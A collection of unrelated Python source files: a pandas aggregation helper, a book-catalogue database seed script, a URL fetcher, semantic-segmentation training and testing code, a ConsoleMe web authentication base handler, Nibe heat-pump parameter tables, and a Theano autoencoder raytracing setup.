else:
mangled_aggspec = _managle_lambda_list(agg_spec)
return mangled_aggspec
def validate_func_kwargs(
kwargs: dict,
) -> tuple[list[str], list[str | Callable[..., Any]]]:
"""
Validates types of user-provided "named aggregation" kwargs.
`TypeError` is raised if aggfunc is not `str` or callable.
Parameters
----------
kwargs : dict
Returns
-------
columns : List[str]
List of user-provied keys.
func : List[Union[str, callable[...,Any]]]
List of user-provided aggfuncs
Examples
--------
>>> validate_func_kwargs({'one': 'min', 'two': 'max'})
(['one', 'two'], ['min', 'max'])
"""
tuple_given_message = "func is expected but received {} in **kwargs."
columns = list(kwargs)
func = []
for col_func in kwargs.values():
if not (isinstance(col_func, str) or callable(col_func)):
raise TypeError(tuple_given_message.format(type(col_func).__name__))
func.append(col_func)
if not columns:
no_arg_message = "Must provide 'func' or named aggregation **kwargs."
raise TypeError(no_arg_message)
return columns, func
|
py | b411113c03c91effd3f04585278348e4775bb415 | """
Populates the db with some data
Used for dev purposes
"""
# [START imports]
from database import db_session, User, Category, Book
# [END imports]
# Add User
user1 = User(name="Mr. Clement DuBuque", email="[email protected]")
db_session.add(user1)
db_session.commit()
user2 = User(name="Tressie Bernier", email="[email protected]")
db_session.add(user2)
db_session.commit()
# Add categories no users = dev 1
# category1 = Category(name="Autobiography")
# db_session.add(category1)
# db_session.commit()
# category2 = Category(name="Web Development")
# db_session.add(category2)
# db_session.commit()
# category3 = Category(name="Science Fiction")
# db_session.add(category3)
# db_session.commit()
# Add categories with users = dev 2
category1 = Category(name="Autobiography", user=user1)
db_session.add(category1)
db_session.commit()
category2 = Category(name="Web Development", user=user1)
db_session.add(category2)
db_session.commit()
category3 = Category(name="Science Fiction", user=user2)
db_session.add(category3)
db_session.commit()
category4 = Category(name="Sport", user=user2)
db_session.add(category4)
db_session.commit()
category5 = Category(name="Thrillers", user=user1)
db_session.add(category5)
db_session.commit()
category6 = Category(name="Nature", user=user2)
db_session.add(category6)
db_session.commit()
category7 = Category(name="Business", user=user1)
db_session.add(category7)
db_session.commit()
# Add Autobiography books; remove user if dev 1
bookItem1 = Book(name="Steve Jobs: A Biography",
description="Driven by demons, Jobs could drive those around "
"him to fury and despair. But his personality and products "
"were interrelated, just as Apples hardware and software "
"tended to be, as if part of an integrated system. His tale "
"is instructive and cautionary, filled with lessons about "
"innovation, character, leadership, and values.",
author="Walter Isaacson",
price="9.99", category=category1, user=user1)
db_session.add(bookItem1)
db_session.commit()
# Add web dev books; remove user if dev 1
bookItem2 = Book(name="Automate the Boring Stuff",
description="Practical programming for total beginners. In "
"Automate the Boring Stuff with Python, you'll learn how to "
"use Python to write programs that do in minutes what would "
"take you hours to do by hand-no prior programming "
"experience required.",
author="Al Sweigart", price="14.99", category=category2,
user=user1)
db_session.add(bookItem2)
db_session.commit()
bookItem3 = Book(name="Javascript and jQuery",
description="Welcome to a nicer way to learn Javascript "
"& jQuery",
author="John Duckett", price="19.99", category=category2,
user=user1)
db_session.add(bookItem3)
db_session.commit()
bookItem4 = Book(name="Learn Python the Hard Way",
description="Zed Shaw has perfected the world's best "
"system for learning Python. Follow it and you will "
"succeed-just like the hundreds of thousands of beginners "
"Zed has taught to date! You bring the discipline, "
"commitment, and persistence; the author supplies "
"everything else. ",
author="Zed Shaw", price="18.99", category=category2,
user=user1)
db_session.add(bookItem4)
db_session.commit()
bookItem5 = Book(name="Python for Data Analysis",
description="Python for Data Analysis is concerned with "
"the nuts and bolts of manipulating, processing, cleaning, "
"and crunching data in Python. It is also a practical, "
"modern introduction to scientific computing in Python, "
"tailored for data-intensive applications.",
author="Wes McKinney", price="9.99", category=category2,
user=user1)
db_session.add(bookItem5)
db_session.commit()
bookItem6 = Book(name="Hacking: Beginner to Expert Guide",
description="This book will teach you how you can protect "
"yourself from most common hacking attacks -- by knowing "
"how hacking actually works!",
author="James Patterson", price="1.99", category=category2,
user=user2)
db_session.add(bookItem6)
db_session.commit()
bookItem7 = Book(name="Make Your Own Neural Network",
description="A step-by-step gentle journey through the "
"mathematics of neural networks, and making your own "
"using the Python computer language.",
author="Tariq Rashid", price="24.99", category=category2,
user=user1)
db_session.add(bookItem7)
db_session.commit()
# Add sci fi books; remove user if dev 1
bookItem8 = Book(name="Wool",
description="Thousands of them have lived underground."
"They've lived there so long, there are only legends about "
"people living anywhere else. Such a life requires rules. "
"Strict rules. There are things that must not be discussed. "
"Like going outside. Never mention you might like going "
"outside.",
author="Hugh Howey",
price="3.99", category=category3, user=user2)
db_session.add(bookItem8)
db_session.commit()
# Add thriller books; remove user if dev 1
bookItem9 = Book(name="Night School: A Jack Reacher Novel",
description="It is 1996, and Reacher is still in the army.",
author="Lee Child", price="7.99", category=category5,
user=user1)
db_session.add(bookItem9)
db_session.commit()
bookItem10 = Book(name="The Girl on the Train",
description="Rachel catches the same commuter train every "
"morning. She knows it will wait at the same signal each "
"time, overlooking a row of back gardens. She is even "
"started to feel like she knows the people who live in "
"one of the houses. Jess and Jason, she calls them. "
"Their life, as she sees it, is perfect. "
"If only Rachel could be that happy.",
author="Paula Hawkins", price="4.99", category=category5,
user=user1)
db_session.add(bookItem10)
db_session.commit()
|
py | b411119ba576ae7cddd067a083256986df127a5b | #
# (c) 2016 Ruben Schmidmeister
#
from urllib import request
def fetch(url):
content = ''
response = request.urlopen(url)
while True:
chunk = response.read().decode('utf8')
if not chunk:
break
content = content + chunk
return content
|
py | b41112016dc9fa35d3e6c4a811871cd7f6293a15 | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Ke Sun ([email protected])
# ------------------------------------------------------------------------------
import logging
import os
import time
import numpy as np
import numpy.ma as ma
from tqdm import tqdm
import torch
import torch.nn as nn
from torch.nn import functional as F
from .utils.utils import AverageMeter
from .utils.utils import get_confusion_matrix
from .utils.utils import adjust_learning_rate
def train(config, epoch, num_epoch, epoch_iters, base_lr,
num_iters, trainloader, optimizer, model, writer_dict):
# Training
model.train()
batch_time = AverageMeter()
ave_loss = AverageMeter()
tic = time.time()
cur_iters = epoch*epoch_iters
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
for i_iter, batch in enumerate(trainloader, 0):
images, labels, _, _ = batch
images = images.cuda()
labels = labels.long().cuda()
losses, _ = model(images, labels)
loss = losses.mean()
model.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - tic)
tic = time.time()
# update average loss
ave_loss.update(loss.item())
lr = adjust_learning_rate(optimizer,
base_lr,
num_iters,
i_iter+cur_iters)
if i_iter % config.PRINT_FREQ == 0:
msg = 'Epoch: [{}/{}] Iter:[{}/{}], Time: {:.2f}, ' \
'lr: {:.6f}, Loss: {:.6f}' .format(
epoch, num_epoch, i_iter, epoch_iters,
batch_time.average(), lr, ave_loss.average())
logging.info(msg)
writer.add_scalar('train_loss', ave_loss.average(), global_steps)
writer_dict['train_global_steps'] = global_steps + 1
def validate(config, testloader, model, writer_dict):
model.eval()
ave_loss = AverageMeter()
confusion_matrix = np.zeros(
(config.DATASET.NUM_CLASSES, config.DATASET.NUM_CLASSES))
with torch.no_grad():
for _, batch in enumerate(testloader):
image, label, _, _ = batch
size = label.size()
label = label.long().cuda()
losses, pred = model(image, label)
pred = F.upsample(input=pred, size=(
size[-2], size[-1]), mode='bilinear')
loss = losses.mean()
ave_loss.update(loss.item())
confusion_matrix += get_confusion_matrix(
label,
pred,
size,
config.DATASET.NUM_CLASSES,
config.TRAIN.IGNORE_LABEL)
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
writer = writer_dict['writer']
global_steps = writer_dict['valid_global_steps']
writer.add_scalar('valid_loss', ave_loss.average(), global_steps)
writer.add_scalar('valid_mIoU', mean_IoU, global_steps)
writer_dict['valid_global_steps'] = global_steps + 1
return ave_loss.average(), mean_IoU, IoU_array
def testval(config, test_dataset, testloader, model,
sv_dir='', sv_pred=False):
model.eval()
confusion_matrix = np.zeros(
(config.DATASET.NUM_CLASSES, config.DATASET.NUM_CLASSES))
with torch.no_grad():
for index, batch in enumerate(tqdm(testloader)):
image, label, _, name = batch
size = label.size()
pred = test_dataset.multi_scale_inference(
model,
image,
scales=config.TEST.SCALE_LIST,
flip=config.TEST.FLIP_TEST)
if pred.size()[-2] != size[-2] or pred.size()[-1] != size[-1]:
pred = F.upsample(pred, (size[-2], size[-1]),
mode='bilinear')
confusion_matrix += get_confusion_matrix(
label,
pred,
size,
config.DATASET.NUM_CLASSES,
config.TRAIN.IGNORE_LABEL)
if sv_pred:
sv_path = os.path.join(sv_dir,'test_results')
if not os.path.exists(sv_path):
os.mkdir(sv_path)
test_dataset.save_pred(pred, sv_path, name)
if index % 100 == 0:
logging.info('processing: %d images' % index)
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
logging.info('mIoU: %.4f' % (mean_IoU))
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
pixel_acc = tp.sum()/pos.sum()
mean_acc = (tp/np.maximum(1.0, pos)).mean()
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
return mean_IoU, IoU_array, pixel_acc, mean_acc
def test(config, test_dataset, testloader, model,
sv_dir='', sv_pred=True):
model.eval()
with torch.no_grad():
for _, batch in enumerate(tqdm(testloader)):
image, size, name = batch
size = size[0]
pred = test_dataset.multi_scale_inference(
model,
image,
scales=config.TEST.SCALE_LIST,
flip=config.TEST.FLIP_TEST)
if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:
pred = F.upsample(pred, (size[-2], size[-1]),
mode='bilinear')
if sv_pred:
sv_path = os.path.join(sv_dir,'test_results')
if not os.path.exists(sv_path):
os.mkdir(sv_path)
test_dataset.save_pred(pred, sv_path, name) |
py | b4111389dcd3e081f294f14b5c31e2581a1dc4e5 | """Handle the base."""
import asyncio
import time
import traceback
import uuid
from datetime import datetime, timedelta
from typing import Any, Union
import pytz
import redis
import tornado.httpclient
import tornado.httputil
import tornado.web
import ujson as json
from tornado import httputil
from consoleme.config import config
from consoleme.exceptions.exceptions import (
InvalidCertificateException,
MissingCertificateException,
MissingConfigurationValue,
NoGroupsException,
NoUserException,
SilentException,
WebAuthNError,
)
from consoleme.lib.alb_auth import authenticate_user_by_alb_auth
from consoleme.lib.auth import AuthenticationError
from consoleme.lib.jwt import generate_jwt_token, validate_and_return_jwt_token
from consoleme.lib.oidc import authenticate_user_by_oidc
from consoleme.lib.plugins import get_plugin_by_name
from consoleme.lib.redis import RedisHandler
from consoleme.lib.saml import authenticate_user_by_saml
from consoleme.lib.tracing import ConsoleMeTracer
log = config.get_logger()
stats = get_plugin_by_name(config.get("plugins.metrics", "default_metrics"))()
auth = get_plugin_by_name(config.get("plugins.auth", "default_auth"))()
group_mapping = get_plugin_by_name(
config.get("plugins.group_mapping", "default_group_mapping")
)()
class TornadoRequestHandler(tornado.web.RequestHandler):
def get_request_ip(self):
trusted_remote_ip_header = config.get("auth.remote_ip.trusted_remote_ip_header")
if trusted_remote_ip_header:
return self.request.headers[trusted_remote_ip_header].split(",")[0]
return self.request.remote_ip
class BaseJSONHandler(TornadoRequestHandler):
# These methods are returned in OPTIONS requests.
# Default methods can be overridden by setting this variable in child classes.
allowed_methods = ["GET", "HEAD", "PUT", "PATCH", "POST", "DELETE"]
def __init__(self, *args, **kwargs):
self.jwt_validator = kwargs.pop("jwt_validator", None)
self.auth_required = kwargs.pop("auth_required", True)
if self.jwt_validator is None:
raise TypeError("Missing required keyword arg jwt_validator")
super().__init__(*args, **kwargs)
def check_xsrf_cookie(self):
# CSRF token is not needed since this is protected by raw OIDC tokens
pass
def options(self, *args):
self.set_header(
"Access-Control-Allow-Headers",
self.request.headers["Access-Control-Request-Headers"],
)
self.set_header("Content-Length", "0")
self.set_status(204)
self.finish()
async def prepare(self):
stats.timer("base_handler.incoming_request")
if self.request.method.lower() == "options":
return
self.request_uuid = str(uuid.uuid4())
payload = self.get_current_user()
self.auth_context = payload
self.user = payload["email"]
def set_default_headers(self, *args, **kwargs):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Methods", ",".join(self.allowed_methods))
self.set_header("Access-Control-Allow-Credentials", "true")
self.set_header("Content-Type", "application/json")
def write_error(self, status_code, **kwargs):
self.set_header("Content-Type", "application/problem+json")
title = httputil.responses.get(status_code, "Unknown")
message = kwargs.get("message", self._reason)
# self.set_status() modifies self._reason, so this call should come after we grab the reason
self.set_status(status_code)
self.finish(
json.dumps(
{"status": status_code, "title": title, "message": message}
) # noqa
)
def get_current_user(self):
try:
if config.get("development") and config.get("json_authentication_override"):
return config.get("json_authentication_override")
tkn_header = self.request.headers["authorization"]
except KeyError:
raise WebAuthNError(reason="Missing Authorization Header")
else:
tkn_str = tkn_header.split(" ")[-1]
try:
tkn = self.jwt_validator(tkn_str)
except AuthenticationError as e:
raise WebAuthNError(reason=e.message)
else:
return tkn
class BaseHandler(TornadoRequestHandler):
"""Default BaseHandler."""
def log_exception(self, *args, **kwargs):
if args[0].__name__ == "SilentException":
pass
else:
super(BaseHandler, self).log_exception(*args, **kwargs)
def write_error(self, status_code: int, **kwargs: Any) -> None:
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
self.set_header("Content-Type", "text/plain")
for line in traceback.format_exception(*kwargs["exc_info"]):
self.write(line)
self.finish()
else:
self.finish(
"<html><title>%(code)d: %(message)s</title>"
"<body>%(code)d: %(message)s</body></html>"
% {
"code": status_code,
"message": f"{self._reason} - {config.get('errors.custom_website_error_message', '')}",
}
)
def data_received(self, chunk):
"""Receives the data."""
pass
def initialize(self, **kwargs) -> None:
self.kwargs = kwargs
self.tracer = None
self.responses = []
super(BaseHandler, self).initialize()
async def prepare(self) -> None:
self.tracer = None
await self.configure_tracing()
if config.get("tornado.xsrf", True):
cookie_kwargs = config.get("tornado.xsrf_cookie_kwargs", {})
self.set_cookie(
config.get("xsrf_cookie_name", "_xsrf"),
self.xsrf_token,
**cookie_kwargs,
)
self.request_uuid = str(uuid.uuid4())
stats.timer("base_handler.incoming_request")
return await self.authorization_flow()
def write(self, chunk: Union[str, bytes, dict]) -> None:
if config.get("_security_risk_full_debugging.enabled"):
if not hasattr(self, "responses"):
self.responses = []
self.responses.append(chunk)
super(BaseHandler, self).write(chunk)
async def configure_tracing(self):
self.tracer = ConsoleMeTracer()
primary_span_name = "{0} {1}".format(
self.request.method.upper(), self.request.path
)
tracer_tags = {
"http.host": config.hostname,
"http.method": self.request.method.upper(),
"http.path": self.request.path,
"ca": self.get_request_ip(), # Client IP
"http.url": self.request.full_url(),
}
tracer = await self.tracer.configure_tracing(
primary_span_name, tags=tracer_tags
)
if tracer:
for k, v in tracer.headers.items():
self.set_header(k, v)
def on_finish(self) -> None:
if hasattr(self, "tracer") and self.tracer:
asyncio.ensure_future(
self.tracer.set_additional_tags({"http.status_code": self.get_status()})
)
asyncio.ensure_future(self.tracer.finish_spans())
asyncio.ensure_future(self.tracer.disable_tracing())
if config.get("_security_risk_full_debugging.enabled"):
responses = None
if hasattr(self, "responses"):
responses = self.responses
request_details = {
"path": self.request.path,
"method": self.request.method,
"body": self.request.body,
"arguments": self.request.arguments,
"body_arguments": self.request.body_arguments,
"headers": dict(self.request.headers.items()),
"query": self.request.query,
"query_arguments": self.request.query_arguments,
"uri": self.request.uri,
"cookies": dict(self.request.cookies.items()),
"response": responses,
}
with open(config.get("_security_risk_full_debugging.file"), "a+") as f:
f.write(json.dumps(request_details, reject_bytes=False))
super(BaseHandler, self).on_finish()
async def attempt_sso_authn(self) -> bool:
"""
ConsoleMe's configuration allows authenticating users by user/password, SSO, or both.
This function helps determine how ConsoleMe should authenticate a user. If user/password login is allowed,
users will be redirected to ConsoleMe's login page (/login). If SSO is also allowed, the Login page will present
a button allowing the user to sign in with SSO.
If user/password login is enabled, we don't want to give users the extra step of having to visit the login page,
so we just authenticate them through SSO directly.
allow authenticating users by a combination of user/password and SSO. In this case, we need to tell
Returns: boolean
"""
if not config.get("auth.get_user_by_password", False):
return True
# force_use_sso indicates the user's intent to authenticate via SSO
force_use_sso = self.request.arguments.get("use_sso", [False])[0]
if force_use_sso:
return True
# It's a redirect from an SSO provider. Let it hit the SSO functionality
if (
"code" in self.request.query_arguments
and "state" in self.request.query_arguments
):
return True
if self.request.path == "/saml/acs":
return True
return False
async def authorization_flow(
self, user: str = None, console_only: bool = True, refresh_cache: bool = False
) -> None:
"""Perform high level authorization flow."""
self.eligible_roles = []
self.eligible_accounts = []
self.request_uuid = str(uuid.uuid4())
refresh_cache = (
self.request.arguments.get("refresh_cache", [False])[0] or refresh_cache
)
attempt_sso_authn = await self.attempt_sso_authn()
refreshed_user_roles_from_cache = False
if not refresh_cache and config.get(
"dynamic_config.role_cache.always_refresh_roles_cache", False
):
refresh_cache = True
self.red = await RedisHandler().redis()
self.ip = self.get_request_ip()
self.user = user
self.groups = None
self.user_role_name = None
self.auth_cookie_expiration = 0
log_data = {
"function": "Basehandler.authorization_flow",
"ip": self.ip,
"request_path": self.request.uri,
"user-agent": self.request.headers.get("User-Agent"),
"request_id": self.request_uuid,
"message": "Incoming request",
}
log.debug(log_data)
# Check to see if user has a valid auth cookie
if config.get("auth_cookie_name", "consoleme_auth"):
auth_cookie = self.get_cookie(
config.get("auth_cookie_name", "consoleme_auth")
)
# Validate auth cookie and use it to retrieve group information
if auth_cookie:
res = await validate_and_return_jwt_token(auth_cookie)
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
self.auth_cookie_expiration = res.get("exp")
if not self.user:
# Check for development mode and a configuration override that specify the user and their groups.
if config.get("development") and config.get("_development_user_override"):
self.user = config.get("_development_user_override")
if config.get("development") and config.get("_development_groups_override"):
self.groups = config.get("_development_groups_override")
if not self.user:
# SAML flow. If user has a JWT signed by ConsoleMe, and SAML is enabled in configuration, user will go
# through this flow.
if config.get("auth.get_user_by_saml", False) and attempt_sso_authn:
res = await authenticate_user_by_saml(self)
if not res:
if (
self.request.uri != "/saml/acs"
and not self.request.uri.startswith("/auth?")
):
raise SilentException(
"Unable to authenticate the user by SAML. "
"Redirecting to authentication endpoint"
)
return
if not self.user:
if config.get("auth.get_user_by_oidc", False) and attempt_sso_authn:
res = await authenticate_user_by_oidc(self)
if not res:
raise SilentException(
"Unable to authenticate the user by OIDC. "
"Redirecting to authentication endpoint"
)
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
if not self.user:
if config.get("auth.get_user_by_aws_alb_auth", False):
res = await authenticate_user_by_alb_auth(self)
if not res:
raise Exception("Unable to authenticate the user by ALB Auth")
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
if not self.user:
# Username/Password authn flow
if config.get("auth.get_user_by_password", False):
after_redirect_uri = self.request.arguments.get("redirect_url", [""])[0]
if after_redirect_uri and isinstance(after_redirect_uri, bytes):
after_redirect_uri = after_redirect_uri.decode("utf-8")
self.set_status(403)
self.write(
{
"type": "redirect",
"redirect_url": f"/login?redirect_after_auth={after_redirect_uri}",
"reason": "unauthenticated",
"message": "User is not authenticated. Redirect to authenticate",
}
)
await self.finish()
raise SilentException(
"Redirecting user to authenticate by username/password."
)
if not self.user:
try:
# Get user. Config options can specify getting username from headers or
# OIDC, but custom plugins are also allowed to override this.
self.user = await auth.get_user(headers=self.request.headers)
if not self.user:
raise NoUserException(
f"User not detected. Headers: {self.request.headers}"
)
log_data["user"] = self.user
except NoUserException:
self.clear()
self.set_status(403)
stats.count(
"Basehandler.authorization_flow.no_user_detected",
tags={
"request_path": self.request.uri,
"ip": self.ip,
"user_agent": self.request.headers.get("User-Agent"),
},
)
log_data["message"] = "No user detected. Check configuration."
log.error(log_data)
await self.finish(log_data["message"])
raise
self.contractor = config.config_plugin().is_contractor(self.user)
if config.get("auth.cache_user_info_server_side", True) and not refresh_cache:
try:
cache_r = self.red.get(f"USER-{self.user}-CONSOLE-{console_only}")
except redis.exceptions.ConnectionError:
cache_r = None
if cache_r:
log_data["message"] = "Loading from cache"
log.debug(log_data)
cache = json.loads(cache_r)
self.groups = cache.get("groups")
self.eligible_roles = cache.get("eligible_roles")
self.eligible_accounts = cache.get("eligible_accounts")
self.user_role_name = cache.get("user_role_name")
refreshed_user_roles_from_cache = True
try:
if not self.groups:
self.groups = await auth.get_groups(
self.user, headers=self.request.headers
)
if not self.groups:
raise NoGroupsException(
f"Groups not detected. Headers: {self.request.headers}"
)
except NoGroupsException:
stats.count("Basehandler.authorization_flow.no_groups_detected")
log_data["message"] = "No groups detected. Check configuration."
log.error(log_data)
# Set Per-User Role Name (This logic is not used in OSS deployment)
if (
config.get("user_roles.opt_in_group")
and config.get("user_roles.opt_in_group") in self.groups
):
# Get or create user_role_name attribute
self.user_role_name = await auth.get_or_create_user_role_name(self.user)
self.eligible_roles = await group_mapping.get_eligible_roles(
self.user, self.groups, self.user_role_name, console_only=console_only
)
if not self.eligible_roles:
log_data[
"message"
] = "No eligible roles detected for user. But letting them continue"
log.warning(log_data)
log_data["eligible_roles"] = len(self.eligible_roles)
if not self.eligible_accounts:
try:
self.eligible_accounts = await group_mapping.get_eligible_accounts(
self.eligible_roles
)
log_data["eligible_accounts"] = len(self.eligible_accounts)
log_data["message"] = "Successfully authorized user."
log.debug(log_data)
except Exception:
stats.count("Basehandler.authorization_flow.exception")
log.error(log_data, exc_info=True)
raise
if (
config.get("auth.cache_user_info_server_side", True)
and self.groups
# Only set role cache if we didn't retrieve user's existing roles from cache
and not refreshed_user_roles_from_cache
):
try:
self.red.setex(
f"USER-{self.user}-CONSOLE-{console_only}",
config.get("dynamic_config.role_cache.cache_expiration", 60),
json.dumps(
{
"groups": self.groups,
"eligible_roles": self.eligible_roles,
"eligible_accounts": self.eligible_accounts,
"user_role_name": self.user_role_name,
}
),
)
except redis.exceptions.ConnectionError:
pass
if (
config.get("auth.set_auth_cookie")
and config.get("auth_cookie_name", "consoleme_auth")
and not self.get_cookie(config.get("auth_cookie_name", "consoleme_auth"))
):
expiration = datetime.utcnow().replace(tzinfo=pytz.UTC) + timedelta(
minutes=config.get("jwt.expiration_minutes", 60)
)
encoded_cookie = await generate_jwt_token(
self.user, self.groups, exp=expiration
)
self.set_cookie(
config.get("auth_cookie_name", "consoleme_auth"),
encoded_cookie,
expires=expiration,
secure=config.get(
"auth.cookie.secure",
"https://" in config.get("url"),
),
httponly=config.get("auth.cookie.httponly", True),
samesite=config.get("auth.cookie.samesite", True),
)
if self.tracer:
await self.tracer.set_additional_tags({"USER": self.user})
class BaseAPIV1Handler(BaseHandler):
"""Default API Handler for api/v1/* routes."""
def set_default_headers(self) -> None:
self.set_header("Content-Type", "application/json")
class BaseAPIV2Handler(BaseHandler):
"""Default API Handler for api/v2/* routes."""
def set_default_headers(self) -> None:
self.set_header("Content-Type", "application/json")
def write_error(self, status_code: int, **kwargs: Any) -> None:
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
self.set_header("Content-Type", "text/plain")
self.set_status(status_code)
for line in traceback.format_exception(*kwargs["exc_info"]):
self.write(line)
self.finish()
else:
self.set_header("Content-Type", "application/problem+json")
title = httputil.responses.get(status_code, "Unknown")
message = kwargs.get("message", self._reason)
# self.set_status() modifies self._reason, so this call should come after we grab the reason
self.set_status(status_code)
self.finish(
json.dumps(
{"status": status_code, "title": title, "message": message}
) # noqa
)
class BaseMtlsHandler(BaseAPIV2Handler):
def initialize(self, **kwargs):
self.kwargs = kwargs
async def prepare(self):
self.tracer = None
self.span = None
self.spans = {}
self.responses = []
self.request_uuid = str(uuid.uuid4())
self.auth_cookie_expiration = 0
stats.timer("base_handler.incoming_request")
if config.get("auth.require_mtls", False):
try:
await auth.validate_certificate(self.request.headers)
except InvalidCertificateException:
stats.count(
"GetCredentialsHandler.post.invalid_certificate_header_value"
)
self.set_status(403)
self.write({"code": "403", "message": "Invalid Certificate"})
await self.finish()
return
# Extract user from valid certificate
try:
self.requester = await auth.extract_user_from_certificate(
self.request.headers
)
self.current_cert_age = await auth.get_cert_age_seconds(
self.request.headers
)
except (MissingCertificateException, Exception) as e:
if isinstance(e, MissingCertificateException):
stats.count("BaseMtlsHandler.post.missing_certificate_header")
message = "Missing Certificate in Header."
else:
stats.count("BaseMtlsHandler.post.exception")
message = f"Invalid Mtls Certificate: {e}"
self.set_status(400)
self.write({"code": "400", "message": message})
await self.finish()
return
elif config.get("auth.require_jwt", True):
# Check to see if user has a valid auth cookie
if config.get("auth_cookie_name", "consoleme_auth"):
auth_cookie = self.get_cookie(
config.get("auth_cookie_name", "consoleme_auth")
)
if auth_cookie:
res = await validate_and_return_jwt_token(auth_cookie)
if not res:
error = {
"code": "invalid_jwt",
"message": "JWT is invalid or has expired.",
"request_id": self.request_uuid,
}
self.set_status(403)
self.write(error)
await self.finish()
self.user = res.get("user")
self.groups = res.get("groups")
self.requester = {"type": "user", "email": self.user}
self.current_cert_age = int(time.time()) - res.get("iat")
self.auth_cookie_expiration = res.get("exp")
else:
raise MissingConfigurationValue(
"Auth cookie name is not defined in configuration."
)
else:
raise MissingConfigurationValue("Unsupported authentication scheme.")
if not hasattr(self, "requester"):
raise tornado.web.HTTPError(403, "Unable to authenticate user.")
self.ip = self.get_request_ip()
await self.configure_tracing()
def write(self, chunk: Union[str, bytes, dict]) -> None:
if config.get("_security_risk_full_debugging.enabled"):
self.responses.append(chunk)
super(BaseMtlsHandler, self).write(chunk)
def on_finish(self) -> None:
if config.get("_security_risk_full_debugging.enabled"):
request_details = {
"path": self.request.path,
"method": self.request.method,
"body": self.request.body,
"arguments": self.request.arguments,
"body_arguments": self.request.body_arguments,
"headers": dict(self.request.headers.items()),
"query": self.request.query,
"query_arguments": self.request.query_arguments,
"uri": self.request.uri,
"cookies": dict(self.request.cookies.items()),
"response": self.responses,
}
with open(config.get("_security_risk_full_debugging.file"), "a+") as f:
f.write(json.dumps(request_details, reject_bytes=False))
super(BaseMtlsHandler, self).on_finish()
class NoCacheStaticFileHandler(tornado.web.StaticFileHandler):
def set_default_headers(self) -> None:
self.set_header(
"Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"
)
|
py | b41114286852baab6d9887a984c97c9515366343 | from .types import HotWaterSystem, ClimateSystem, VentilationSystem
MAX_REQUEST_PARAMETERS = 15
PARAM_HOTWATER_SYSTEMS = {
"1": HotWaterSystem(
"Hot Water",
40014,
40013,
47041,
47387,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"DEW": HotWaterSystem(
"Hot Water (DEW)",
40077,
40078,
47041,
47555,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"SCA": HotWaterSystem(
"Hot Water (SCA)",
40077,
40078,
47041,
49224,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"AHPS": HotWaterSystem(
"Hot Water (AHPS)",
40077,
40078,
47041,
48641,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
}
PARAM_CLIMATE_SYSTEMS = {
# BT3 BT2 CSTH OC BT50 RSH RSC URS AA EAA CSTC OH HC MIS MAS HP # noqa: 501
"1": ClimateSystem(
"S1",
40012,
40008,
43009,
48739,
40033,
47398,
48785,
47394,
None,
43161,
44270,
47011,
47007,
47015,
47016,
None,
), # noqa: 501
"2": ClimateSystem(
"S2",
40129,
40007,
43008,
48738,
40032,
47397,
48784,
47393,
47302,
43160,
44269,
47010,
47006,
47014,
47017,
44746,
), # noqa: 501
"3": ClimateSystem(
"S3",
40128,
40006,
43007,
48737,
40031,
47396,
48783,
47392,
47303,
43159,
44268,
47009,
47005,
47013,
47018,
44745,
), # noqa: 501
"4": ClimateSystem(
"S4",
40127,
40005,
43006,
48736,
40030,
47395,
48782,
47391,
47304,
43158,
44267,
47008,
47004,
47012,
47019,
44744,
), # noqa: 501
}
PARAM_VENTILATION_SYSTEMS = {
"1": VentilationSystem(
"Ventilation",
10001,
40025,
40026,
47265,
47264,
47263,
47262,
47261,
"ventilation_boost",
)
}
PARAM_PUMP_SPEED_HEATING_MEDIUM = 43437
PARAM_COMPRESSOR_FREQUENCY = 43136
PARAM_STATUS_COOLING = 43024
SMARTHOME_MODES = {
0: "DEFAULT_OPERATION",
1: "AWAY_FROM_HOME",
2: "VACATION",
}
|
py | b4111444ae45e8f334eb59548753846a2a39d4d6 | import os
import numpy as np
import theano.tensor as T
import theano
from scipy import misc
from autoencoder import Autoencoder
from transform import *
from scene import *
from shader import *
from optimize import *
if not os.path.exists('output'):
os.makedirs('output')
#train_data = np.array([misc.imread('example.png').flatten()], dtype='float32')/255.0
train_data = np.asarray([misc.imread('15.png').flatten()], dtype='float32')/255.0
N,D = train_data.shape
img_sz = int(np.sqrt(D))
def scene(capsules, obj_params):
shapes = []
#TODO move the material information to attribute of capsule instance
material1 = Material((0.2, 0.9, 0.4), 0.3, 0.7, 0.5, 50.)
for i in xrange(len(capsules)):
capsule = capsules[i]
obj_param = obj_params[i]
t1 = translate(obj_param[:3]) * scale(obj_param[3:])
if capsule.name == 'sphere':
shapes.append(Sphere(t1, material1))
elif capsule.name == 'square':
shapes.append(Square(t1, material1))
elif capsule.name == 'light':
shapes.append(Light(t1, material1))
light = Light((-1., -1., 2.), (0.961, 1., 0.87))
camera = Camera(img_sz, img_sz)
#shader = PhongShader()
shader = DepthMapShader(6.1)
scene = Scene(shapes, [light], camera, shader)
return scene.build()
#Hyper-parameters
